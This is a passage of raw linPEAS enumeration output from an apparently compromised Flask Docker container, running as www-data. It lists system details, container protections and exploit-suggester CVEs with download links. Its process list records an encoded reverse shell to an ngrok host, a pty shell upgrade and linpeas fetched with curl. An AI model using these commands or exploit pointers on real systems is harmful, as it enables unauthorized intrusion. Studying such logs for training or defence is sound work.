╔═══════════════════╗ ═══════════════════════════════╣ Basic information ╠═══════════════════════════════ ╚═══════════════════╝ OS: Linux version 5.10.0-21-amd64 (debian-kernel@lists.debian.org) (gcc-10 (Debian 10.2.1-6) 10.2.1 20210110, GNU ld (GNU Binutils for Debian) 2.35.2) #1 SMP Debian 5.10.162-1 (2023-01-21) User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data) Hostname: flask Writable folder: /dev/shm [-] No network discovery capabilities (fping or ping not found) [+] /usr/bin/bash is available for network discovery, port scanning and port forwarding (linpeas can discover hosts, scan ports, and forward ports. Learn more with -h) Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE ╔════════════════════╗ ══════════════════════════════╣ System Information ╠══════════════════════════════ ╚════════════════════╝ ╔══════════╣ Operative system ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits Linux version 5.10.0-21-amd64 (debian-kernel@lists.debian.org) (gcc-10 (Debian 10.2.1-6) 10.2.1 20210110, GNU ld (GNU Binutils for Debian) 2.35.2) #1 SMP Debian 5.10.162-1 (2023-01-21) Distributor ID: Ubuntu Description: Ubuntu 22.04.2 LTS Release: 22.04 Codename: jammy ╔══════════╣ Sudo version ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version Sudo version 1.9.9 ╔══════════╣ PATH ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin ╔══════════╣ Date & uptime Sat May 13 13:27:13 UTC 2023 13:27:13 up 1 day, 4:22, 0 users, load average: 8.81, 7.20, 3.94 ╔══════════╣ Any sd*/disk* disk in /dev? (limit 20) ╔══════════╣ Unmounted file-system? ╚ Check if you can mount umounted devices ╔══════════╣ Environment ╚ Any private information inside environment variables? SUDO_GID=0 HISTFILESIZE=0 MAIL=/var/mail/www-data USER=www-data HOSTNAME=flask SHLVL=2 HOME=/var/www LC_CTYPE=C.UTF-8 WERKZEUG_SERVER_FD=3 SUDO_UID=0 LOGNAME=www-data _=/usr/bin/sh TERM=unknown PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin HISTSIZE=0 SUDO_COMMAND=/usr/bin/python3 app.py --port 80 SHELL=/usr/sbin/nologin SUDO_USER=root PWD=/var/www/app HISTFILE=/dev/null ╔══════════╣ Searching Signature verification failed in dmesg ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#dmesg-signature-verification-failed dmesg Not Found ╔══════════╣ Executing Linux Exploit Suggester ╚ https://github.com/mzet-/linux-exploit-suggester [+] [CVE-2021-3490] eBPF ALU32 bounds tracking for bitwise ops Details: https://www.graplsecurity.com/post/kernel-pwning-with-ebpf-a-love-story Exposure: probable Tags: ubuntu=20.04{kernel:5.8.0-(25|26|27|28|29|30|31|32|33|34|35|36|37|38|39|40|41|42|43|44|45|46|47|48|49|50|51|52)-*},ubuntu=21.04{kernel:5.11.0-16-*} Download URL: https://codeload.github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490/zip/main Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1 [+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET) Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/ https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/ Exposure: less probable Tags: ubuntu=(22.04){kernel:5.15.0-27-generic} Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN) [+] [CVE-2022-2586] nft_object UAF Details: https://www.openwall.com/lists/oss-security/2022/08/29/5 Exposure: less probable Tags: ubuntu=(20.04){kernel:5.12.13} Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1 Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN) [+] [CVE-2022-0847] DirtyPipe Details: https://dirtypipe.cm4all.com/ Exposure: less probable Tags: ubuntu=(20.04|21.04),debian=11 Download URL: https://haxx.in/files/dirtypipez.c [+] [CVE-2021-4034] PwnKit Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt Exposure: less probable Tags: ubuntu=10|11|12|13|14|15|16|17|18|19|20|21,debian=7|8|9|10|11,fedora,manjaro Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main [+] [CVE-2021-3156] sudo Baron Samedit Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt Exposure: less probable Tags: mint=19,ubuntu=18|20, debian=10 Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main [+] [CVE-2021-3156] sudo Baron Samedit 2 Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt Exposure: less probable Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10 Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main [+] [CVE-2021-27365] linux-iscsi Details: https://blog.grimm-co.com/2021/03/new-old-bugs-in-linux-kernel.html Exposure: less probable Tags: RHEL=8 Download URL: https://codeload.github.com/grimm-co/NotQuite0DayFriday/zip/trunk Comments: CONFIG_SLAB_FREELIST_HARDENED must not be enabled [+] [CVE-2021-22555] Netfilter heap out-of-bounds write Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html Exposure: less probable Tags: ubuntu=20.04{kernel:5.8.0-*} Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c Comments: ip_tables kernel module must be loaded ╔══════════╣ Executing Linux Exploit Suggester 2 ╚ https://github.com/jondonas/linux-exploit-suggester-2 ╔══════════╣ Protections ═╣ AppArmor enabled? .............. AppArmor Not Found ═╣ AppArmor profile? .............. docker-default (enforce) ═╣ is linuxONE? ................... s390x Not Found ═╣ grsecurity present? ............ grsecurity Not Found ═╣ PaX bins present? .............. PaX Not Found ═╣ Execshield enabled? ............ Execshield Not Found ═╣ SELinux enabled? ............... sestatus Not Found ═╣ Seccomp enabled? ............... enabled ═╣ User namespace? ................ enabled ═╣ Cgroup2 enabled? ............... enabled ═╣ Is ASLR enabled? ............... Yes ═╣ Printer? ....................... No ═╣ Is this a virtual machine? ..... Yes (docker) ╔═══════════╗ ═══════════════════════════════════╣ Container ╠═══════════════════════════════════ ╚═══════════╝ ╔══════════╣ Container related tools present (if any): ╔══════════╣ Am I Containered? ╔══════════╣ Container details ═╣ Is this a container? ........... docker ═╣ Any running containers? ........ No ╔══════════╣ Docker Container details ═╣ Am I inside Docker group ....... No ═╣ Looking and enumerating Docker Sockets (if any): ═╣ Docker version ................. Not Found ═╣ Vulnerable to CVE-2019-5736 .... Not Found ═╣ Vulnerable to CVE-2019-13139 ... Not Found ═╣ Rootless Docker? ............... No ╔══════════╣ Container & breakout enumeration ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout ═╣ Container ID ................... flask═╣ Container Full ID .............. / ═╣ Seccomp enabled? ............... enabled ═╣ AppArmor profile? .............. docker-default (enforce) ═╣ User proc namespace? ........... enabled 0 0 4294967295 ═╣ Vulnerable to CVE-2019-5021 .... No ══╣ Breakout via mounts ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/sensitive-mounts ═╣ /proc mounted? ................. No ═╣ /dev mounted? .................. No ═╣ Run ushare ..................... No ═╣ release_agent breakout 1........ No ═╣ release_agent breakout 2........ No ═╣ core_pattern breakout .......... No ═╣ binfmt_misc breakout ........... No ═╣ uevent_helper breakout ......... No ═╣ is modprobe present ............ No ═╣ DoS via panic_on_oom ........... No ═╣ DoS via panic_sys_fs ........... No ═╣ DoS via sysreq_trigger_dos ..... No ═╣ /proc/config.gz readable ....... No ═╣ /proc/sched_debug readable ..... Yes ═╣ /proc/*/mountinfo readable ..... Yes ═╣ /sys/kernel/security present ... Yes ═╣ /sys/kernel/security writable .. No ══╣ Namespaces ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/namespaces total 0 lrwxrwxrwx 1 www-data www-data 0 May 13 13:27 cgroup -> 'cgroup:[4026532971]' lrwxrwxrwx 1 www-data www-data 0 May 13 13:27 ipc -> 'ipc:[4026532600]' lrwxrwxrwx 1 www-data www-data 0 May 13 13:27 mnt -> 'mnt:[4026532598]' lrwxrwxrwx 1 www-data www-data 0 May 13 13:27 net -> 'net:[4026532722]' lrwxrwxrwx 1 www-data www-data 0 May 13 13:27 pid -> 'pid:[4026532601]' lrwxrwxrwx 1 www-data www-data 0 May 13 13:27 pid_for_children -> 'pid:[4026532601]' lrwxrwxrwx 1 www-data www-data 0 May 13 13:27 time -> 'time:[4026531834]' lrwxrwxrwx 1 www-data www-data 0 May 13 13:27 time_for_children -> 'time:[4026531834]' lrwxrwxrwx 1 www-data www-data 0 May 13 13:27 user -> 'user:[4026531837]' lrwxrwxrwx 1 www-data www-data 0 May 13 13:27 uts -> 'uts:[4026532599]' ╔══════════╣ Container Capabilities ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation#capabilities-abuse-escape Current: = Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap Ambient set = Current IAB: !cap_dac_read_search,!cap_linux_immutable,!cap_net_broadcast,!cap_net_admin,!cap_ipc_lock,!cap_ipc_owner,!cap_sys_module,!cap_sys_rawio,!cap_sys_ptrace,!cap_sys_pacct,!cap_sys_admin,!cap_sys_boot,!cap_sys_nice,!cap_sys_resource,!cap_sys_time,!cap_sys_tty_config,!cap_lease,!cap_audit_control,!cap_mac_override,!cap_mac_admin,!cap_syslog,!cap_wake_alarm,!cap_block_suspend,!cap_audit_read,!cap_perfmon,!cap_bpf,!cap_checkpoint_restore Securebits: 00/0x0/1'b0 secure-noroot: no (unlocked) secure-no-suid-fixup: no (unlocked) secure-keep-caps: no (unlocked) secure-no-ambient-raise: no (unlocked) uid=33(www-data) euid=33(www-data) gid=33(www-data) groups=33(www-data) Guessed mode: UNCERTAIN (0) ╔══════════╣ Privilege Mode Not Found ╔══════════╣ Interesting Files Mounted overlay on / type overlay (rw,relatime,lowerdir=/var/lib/docker/overlay2/l/FSGPIH35C67F3MH7S6CO7JH5UU:/var/lib/docker/overlay2/l/M6FCLU47SFPVQ2JQMFWUV2D5WD:/var/lib/docker/overlay2/l/BKTB55EAHIQMXLVS6NNQYRLIDM:/var/lib/docker/overlay2/l/M2O53EG7AOI53ANHEVELXZT3KA:/var/lib/docker/overlay2/l/4XBQTC7THWF2BLEZGE5BJ5JTJ2:/var/lib/docker/overlay2/l/VORYVUQ65FXCEDZQCCACBP7QCU:/var/lib/docker/overlay2/l/25OMTPVT46DNJZACI622FIVR6F:/var/lib/docker/overlay2/l/ZPVY6WK6HS5Z3QSNMACIYZLOQJ:/var/lib/docker/overlay2/l/WDTWGFP2RMSELQC5AZQ3KQZXLB:/var/lib/docker/overlay2/l/ILQOFTRHM32WOOOLL4DCSBRXGG:/var/lib/docker/overlay2/l/2WGQDLRUAVTPAFKXJDHZYQHK5T:/var/lib/docker/overlay2/l/JDU6BCVWUF4ITNBQ3UB7AV6MJF:/var/lib/docker/overlay2/l/7ESFYXR7X3LVMM6C52HI27XM3G:/var/lib/docker/overlay2/l/RF6KNWHQH5JLQESDAAY4ADW7JJ:/var/lib/docker/overlay2/l/6SDRS6AJLSZAPPZ66VMNKSHROT:/var/lib/docker/overlay2/l/CVO5UE7PBYW2TCKZJ3BSZNF325:/var/lib/docker/overlay2/l/ZFJZNNBYZGDID2QYKZXPW2OBKU:/var/lib/docker/overlay2/l/56YMARXVNOAHXMBEGSLZ2MWJJZ:/var/lib/docker/overlay2/l/SZMN4HNJ2E4HRKONXLLC2PCFAL:/var/lib/docker/overlay2/l/UHPIJ2BDPAR2YTKLWJHAIIWQWG:/var/lib/docker/overlay2/l/45EZ7YKIVVQ7P4COEPI2H6NWJH:/var/lib/docker/overlay2/l/ZTNFBK4N6LENHXRFHGTXNQMLLD:/var/lib/docker/overlay2/l/BOB4HOSPJ6VF5DYS2GO7BHLP6X:/var/lib/docker/overlay2/l/FPKLQKW6MJZYXPOMGGMWN22NNA,upperdir=/var/lib/docker/overlay2/1f42311a93c9a7b7ef914bd38b49d4e2e7b1ec8b5ae9d71b8dbb211adad23c81/diff,workdir=/var/lib/docker/overlay2/1f42311a93c9a7b7ef914bd38b49d4e2e7b1ec8b5ae9d71b8dbb211adad23c81/work) proc on /proc type proc (rw,nosuid,nodev,noexec,relatime) tmpfs on /dev type tmpfs (rw,nosuid,size=65536k,mode=755) devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666) sysfs on /sys type sysfs (ro,nosuid,nodev,noexec,relatime) cgroup on /sys/fs/cgroup type cgroup2 (ro,nosuid,nodev,noexec,relatime,nsdelegate,memory_recursiveprot) mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime) shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k) /dev/sda on /etc/resolv.conf type ext4 (rw,relatime,errors=remount-ro) /dev/sda on /etc/hostname type ext4 (rw,relatime,errors=remount-ro) /dev/sda on /etc/hosts type ext4 (rw,relatime,errors=remount-ro) proc on /proc/bus type proc (ro,relatime) proc on /proc/fs type proc (ro,relatime) proc on /proc/irq type proc (ro,relatime) proc on /proc/sys type proc (ro,relatime) proc on /proc/sysrq-trigger type proc (ro,relatime) tmpfs on /proc/acpi type tmpfs (ro,relatime) tmpfs on /proc/kcore type tmpfs (rw,nosuid,size=65536k,mode=755) tmpfs on /proc/keys type tmpfs (rw,nosuid,size=65536k,mode=755) tmpfs on /proc/timer_list type tmpfs (rw,nosuid,size=65536k,mode=755) tmpfs on /proc/sched_debug type tmpfs (rw,nosuid,size=65536k,mode=755) tmpfs on /sys/firmware type tmpfs (ro,relatime) ╔══════════╣ Possible Entrypoints ╔═══════╗ ═════════════════════════════════════╣ Cloud ╠═════════════════════════════════════ ╚═══════╝ ═╣ Google Cloud Platform? ............... No ═╣ AWS ECS? ............................. No ═╣ AWS EC2? ............................. No ═╣ AWS EC2 Beanstalk? ................... No ═╣ AWS Lambda? .......................... No ═╣ DO Droplet? .......................... No ═╣ IBM Cloud VM? ........................ No ╔════════════════════════════════════════════════╗ ════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════ ╚════════════════════════════════════════════════╝ ╔══════════╣ Cleaned processes ╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes root 1 0.0 0.0 4360 3284 ? Ss 13:16 0:00 /bin/bash /root/start.sh root 7 0.0 0.0 3884 2460 ? S 13:16 0:00 cron -f root 10370 0.0 0.0 7324 4004 ? S 13:27 0:00 _ CRON -f flaskdev 10371 0.0 0.0 2888 1000 ? Ss 13:27 0:00 _ /bin/sh -c /home/flaskdev/reboot_flask.sh flaskdev 10372 0.0 0.0 2888 964 ? S 13:27 0:00 _ /bin/sh /home/flaskdev/reboot_flask.sh flaskdev 10378 1.4 0.1 36492 29908 ? S 13:27 0:00 _ /usr/bin/python3 /var/www/dev/app.py root 8 0.0 0.0 8740 5384 ? S 13:16 0:00 sudo -u www-data /usr/bin/python3 app.py --port 80 www-data 9 0.0 0.1 109536 31524 ? Sl 13:16 0:00 _ /usr/bin/python3 app.py --port 80 www-data 10364 0.0 0.0 2888 1036 ? S 13:26 0:00 _ /bin/sh -c echo YmFzaCAtaSAgPiYgL2Rldi90Y3AvMC50Y3AuaW4ubmdyb2suaW8vMTU1OTIgMD4mMQo= | base64 -d | bash www-data 10367 0.0 0.0 4736 3248 ? S 13:26 0:00 _ bash www-data 10368 0.0 0.0 4868 3772 ? S 13:26 0:00 _ bash -i www-data 10379 0.1 0.0 13712 8172 ? S 13:27 0:00 _ python3 -c import pty;pty.spawn("/bin/bash") www-data 10380 0.0 0.0 4868 3948 pts/0 Ss 13:27 0:00 _ /bin/bash www-data 10383 2.5 0.0 95856 13760 pts/0 S+ 13:27 0:00 _ curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh www-data 10384 2.0 0.0 3852 2732 pts/0 S+ 13:27 0:00 _ sh www-data 13702 0.0 0.0 3852 1072 pts/0 S+ 13:27 0:00 _ sh www-data 13706 0.0 0.0 7436 1596 pts/0 R+ 13:27 0:00 | _ ps fauxwww www-data 13704 0.0 0.0 3852 1072 pts/0 R+ 13:27 0:00 _ sh www-data 13705 0.0 0.0 3852 1072 pts/0 S+ 13:27 0:00 _ sh ╔══════════╣ Binary processes permissions (non 'root root' and not belonging to current user) ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes ╔══════════╣ Processes whose PPID belongs to a different user (not root) ╚ You will know if a user can somehow spawn processes as a different user Proc 9 with ppid 8 is run by user www-data but the ppid user is root Proc 10371 with ppid 10370 is run by user flaskdev but the ppid user is root ╔══════════╣ Files opened by processes belonging to other users ╚ This is usually empty because of the lack of privileges to read other user processes information ╔══════════╣ Processes with credentials in memory (root req) ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#credentials-from-process-memory gdm-password Not Found gnome-keyring-daemon Not Found lightdm Not Found vsftpd Not Found apache2 Not Found sshd Not Found ╔══════════╣ Cron jobs ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs /usr/bin/crontab incrontab Not Found -rw-r--r-- 1 root root 1136 Mar 23 2022 /etc/crontab /etc/cron.d: total 16 drwxr-xr-x 1 root root 4096 May 13 03:06 . drwxr-xr-x 1 root root 4096 May 13 13:16 .. -rw-r--r-- 1 root root 102 Mar 23 2022 .placeholder -rw-r--r-- 1 root root 201 Jan 8 2022 e2scrub_all /etc/cron.daily: total 20 drwxr-xr-x 1 root root 4096 May 13 03:06 . drwxr-xr-x 1 root root 4096 May 13 13:16 .. -rw-r--r-- 1 root root 102 Mar 23 2022 .placeholder -rwxr-xr-x 1 root root 1478 Apr 8 2022 apt-compat -rwxr-xr-x 1 root root 123 Dec 5 2021 dpkg /etc/cron.hourly: total 12 drwxr-xr-x 2 root root 4096 May 13 03:06 . drwxr-xr-x 1 root root 4096 May 13 13:16 .. -rw-r--r-- 1 root root 102 Mar 23 2022 .placeholder /etc/cron.monthly: total 12 drwxr-xr-x 2 root root 4096 May 13 03:06 . drwxr-xr-x 1 root root 4096 May 13 13:16 .. -rw-r--r-- 1 root root 102 Mar 23 2022 .placeholder /etc/cron.weekly: total 12 drwxr-xr-x 2 root root 4096 May 13 03:06 . drwxr-xr-x 1 root root 4096 May 13 13:16 .. -rw-r--r-- 1 root root 102 Mar 23 2022 .placeholder SHELL=/bin/sh 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) ╔══════════╣ Systemd PATH ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#systemd-path-relative-paths ╔══════════╣ Analyzing .service files ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services /usr/lib/systemd/system/dbus.service could be executing some relative path /usr/lib/systemd/system/getty-static.service could be executing some relative path /usr/lib/systemd/system/getty.target.wants/getty-static.service could be executing some relative path /usr/lib/systemd/system/initrd-cleanup.service could be executing some relative path /usr/lib/systemd/system/initrd-parse-etc.service could be executing some relative path /usr/lib/systemd/system/initrd-switch-root.service could be executing some relative path /usr/lib/systemd/system/initrd-udevadm-cleanup-db.service could be executing some relative path /usr/lib/systemd/system/multi-user.target.wants/dbus.service could be executing some relative path /usr/lib/systemd/system/sysinit.target.wants/systemd-boot-system-token.service could be executing some relative path /usr/lib/systemd/system/sysinit.target.wants/systemd-journal-flush.service could be executing some relative path /usr/lib/systemd/system/sysinit.target.wants/systemd-machine-id-commit.service could be executing some relative path You can't write on systemd PATH ╔══════════╣ System timers ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers ╔══════════╣ Analyzing .timer files ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers ╔══════════╣ Analyzing .socket files ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets ╔══════════╣ Unix Sockets Listening ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets sed: -e expression #1, char 0: no previous regular expression ╔══════════╣ D-Bus config files ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus ╔══════════╣ D-Bus Service Objects list ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus busctl Not Found ╔═════════════════════╗ ══════════════════════════════╣ Network Information ╠══════════════════════════════ ╚═════════════════════╝ ╔══════════╣ Hostname, hosts and DNS flask 127.0.0.1 localhost ::1 localhost ip6-localhost ip6-loopback fe00::0 ip6-localnet ff00::0 ip6-mcastprefix ff02::1 ip6-allnodes ff02::2 ip6-allrouters 10.99.225.2 flask search members.linode.com nameserver 127.0.0.11 options rotate ndots:0 ╔══════════╣ Interfaces # symbolic names for networks, see networks(5) for more information link-local 169.254.0.0 Inter-| Receive | Transmit face |bytes packets errs drop fifo frame compressed multicast|bytes packets errs drop fifo colls carrier compressed lo: 4080 40 0 0 0 0 0 0 4080 40 0 0 0 0 0 0 eth0: 1727754 397 0 0 0 0 0 0 203174 358 0 0 0 0 0 0 Main: +-- 0.0.0.0/1 2 0 2 +-- 0.0.0.0/4 2 0 2 |-- 0.0.0.0 /0 universe UNICAST +-- 10.99.225.0/24 2 0 2 +-- 10.99.225.0/30 2 0 2 |-- 10.99.225.0 /32 link BROADCAST /24 link UNICAST |-- 10.99.225.2 /32 host LOCAL |-- 10.99.225.255 /32 link BROADCAST +-- 127.0.0.0/8 2 0 2 +-- 127.0.0.0/31 1 0 0 |-- 127.0.0.0 /32 link BROADCAST /8 host LOCAL |-- 127.0.0.1 /32 host LOCAL |-- 127.255.255.255 /32 link BROADCAST Local: +-- 0.0.0.0/1 2 0 2 +-- 0.0.0.0/4 2 0 2 |-- 0.0.0.0 /0 universe UNICAST +-- 10.99.225.0/24 2 0 2 +-- 10.99.225.0/30 2 0 2 |-- 10.99.225.0 /32 link BROADCAST /24 link UNICAST |-- 10.99.225.2 /32 host LOCAL |-- 10.99.225.255 /32 link BROADCAST +-- 127.0.0.0/8 2 0 2 +-- 127.0.0.0/31 1 0 0 |-- 127.0.0.0 /32 link BROADCAST /8 host LOCAL |-- 127.0.0.1 /32 host LOCAL |-- 127.255.255.255 /32 link BROADCAST ╔══════════╣ Active Ports ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports ╔══════════╣ Can I sniff with tcpdump? No ╔═══════════════════╗ ═══════════════════════════════╣ Users Information ╠═══════════════════════════════ ╚═══════════════════╝ ╔══════════╣ My user ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#users uid=33(www-data) gid=33(www-data) groups=33(www-data) ╔══════════╣ Do I have PGP keys? /usr/bin/gpg netpgpkeys Not Found netpgp Not Found ╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid ╔══════════╣ Checking sudo tokens ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens ptrace protection is disabled (0), so sudo tokens could be abused ╔══════════╣ Checking Pkexec policy ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#pe-method-2 [Configuration] AdminIdentities=unix-user:0 [Configuration] AdminIdentities=unix-group:sudo;unix-group:admin ╔══════════╣ Superusers root:x:0:0:root:/root:/bin/bash ╔══════════╣ Users with console flaskdev:x:1000:1000:,,,:/home/flaskdev:/bin/bash root:x:0:0:root:/root:/bin/bash ╔══════════╣ All users & groups uid=0(root) gid=0(root) groups=0(root) uid=1(daemon[0m) gid=1(daemon[0m) groups=1(daemon[0m) uid=10(uucp) gid=10(uucp) groups=10(uucp) uid=100(_apt) gid=65534(nogroup) groups=65534(nogroup) uid=1000(flaskdev) gid=1000(flaskdev) groups=1000(flaskdev) uid=101(systemd-network) gid=102(systemd-network) groups=102(systemd-network) uid=102(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve) uid=103(messagebus) gid=104(messagebus) groups=104(messagebus) uid=104(systemd-timesync) gid=105(systemd-timesync) groups=105(systemd-timesync) uid=13(proxy) gid=13(proxy) groups=13(proxy) uid=2(bin) gid=2(bin) groups=2(bin) uid=3(sys) gid=3(sys) groups=3(sys) uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=34(backup) gid=34(backup) groups=34(backup) uid=38(list) gid=38(list) groups=38(list) uid=39(irc) gid=39(irc) groups=39(irc) uid=4(sync) gid=65534(nogroup) groups=65534(nogroup) uid=41(gnats) gid=41(gnats) groups=41(gnats) uid=5(games) gid=60(games) groups=60(games) uid=6(man) gid=12(man) groups=12(man) uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) uid=7(lp) gid=7(lp) groups=7(lp) uid=8(mail) gid=8(mail) groups=8(mail) uid=9(news) gid=9(news) groups=9(news) ╔══════════╣ Login now 13:27:18 up 1 day, 4:22, 0 users, load average: 8.91, 7.24, 3.97 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT ╔══════════╣ Last logons wtmp begins Fri May 12 10:35:31 2023 ╔══════════╣ Last time logon each user Username Port From Latest ╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...) ╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!! 100 811k 100 811k 0 0 89636 0 0:00:09 0:00:09 --:--:-- 0 ╔══════════════════════╗ ═════════════════════════════╣ Software Information ╠═════════════════════════════ ╚══════════════════════╝ ╔══════════╣ Useful software /usr/bin/base64 /usr/bin/curl /usr/bin/g++ /usr/bin/gcc /usr/bin/make /usr/bin/perl /usr/bin/python3 /usr/bin/sudo ╔══════════╣ Installed Compilers ii g++ 4:11.2.0-1ubuntu1 amd64 GNU C++ compiler ii g++-11 11.3.0-1ubuntu1~22.04 amd64 GNU C++ compiler ii gcc 4:11.2.0-1ubuntu1 amd64 GNU C compiler ii gcc-11 11.3.0-1ubuntu1~22.04 amd64 GNU C compiler ii rpcsvc-proto 1.4.2-0ubuntu6 amd64 RPC protocol compiler and definitions /usr/bin/gcc ╔══════════╣ Analyzing Ldap Files (limit 70) The password hash is from the {SSHA} to 'structural' drwxr-xr-x 2 root root 4096 May 13 03:06 /etc/ldap ╔══════════╣ Searching ssl/ssh files ══╣ Some certificates were found (out limited): /etc/ssl/certs/ACCVRAIZ1.pem /etc/ssl/certs/AC_RAIZ_FNMT-RCM.pem /etc/ssl/certs/AC_RAIZ_FNMT-RCM_SERVIDORES_SEGUROS.pem /etc/ssl/certs/ANF_Secure_Server_Root_CA.pem /etc/ssl/certs/Actalis_Authentication_Root_CA.pem /etc/ssl/certs/AffirmTrust_Commercial.pem /etc/ssl/certs/AffirmTrust_Networking.pem /etc/ssl/certs/AffirmTrust_Premium.pem /etc/ssl/certs/AffirmTrust_Premium_ECC.pem /etc/ssl/certs/Amazon_Root_CA_1.pem /etc/ssl/certs/Amazon_Root_CA_2.pem /etc/ssl/certs/Amazon_Root_CA_3.pem /etc/ssl/certs/Amazon_Root_CA_4.pem /etc/ssl/certs/Atos_TrustedRoot_2011.pem /etc/ssl/certs/Autoridad_de_Certificacion_Firmaprofesional_CIF_A62634068.pem /etc/ssl/certs/Baltimore_CyberTrust_Root.pem /etc/ssl/certs/Buypass_Class_2_Root_CA.pem /etc/ssl/certs/Buypass_Class_3_Root_CA.pem /etc/ssl/certs/CA_Disig_Root_R2.pem /etc/ssl/certs/CFCA_EV_ROOT.pem 10384PSTORAGE_CERTSBIN ══╣ Writable ssh and gpg agents /etc/systemd/user/sockets.target.wants/gpg-agent-ssh.socket /etc/systemd/user/sockets.target.wants/gpg-agent-browser.socket /etc/systemd/user/sockets.target.wants/gpg-agent-extra.socket /etc/systemd/user/sockets.target.wants/gpg-agent.socket ╔══════════╣ Analyzing PAM Auth Files (limit 70) drwxr-xr-x 1 root root 4096 May 13 03:06 /etc/pam.d ╔══════════╣ Analyzing Keyring Files (limit 70) drwxr-xr-x 2 root root 4096 Apr 8 2022 /etc/apt/keyrings drwxr-xr-x 2 root root 4096 Apr 25 14:06 /usr/share/keyrings ╔══════════╣ Searching uncommon passwd files (splunk) passwd file: /etc/pam.d/passwd passwd file: /etc/passwd passwd file: /usr/share/lintian/overrides/passwd ╔══════════╣ Analyzing PGP-GPG Files (limit 70) /usr/bin/gpg gpg Not Found netpgpkeys Not Found netpgp Not Found -rw-r--r-- 1 root root 1165 May 13 03:06 /etc/apt/trusted.gpg.d/deadsnakes-ubuntu-ppa.gpg -rw-r--r-- 1 root root 2794 Mar 26 2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg -rw-r--r-- 1 root root 1733 Mar 26 2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg -rw-r--r-- 1 root root 2899 Jul 4 2022 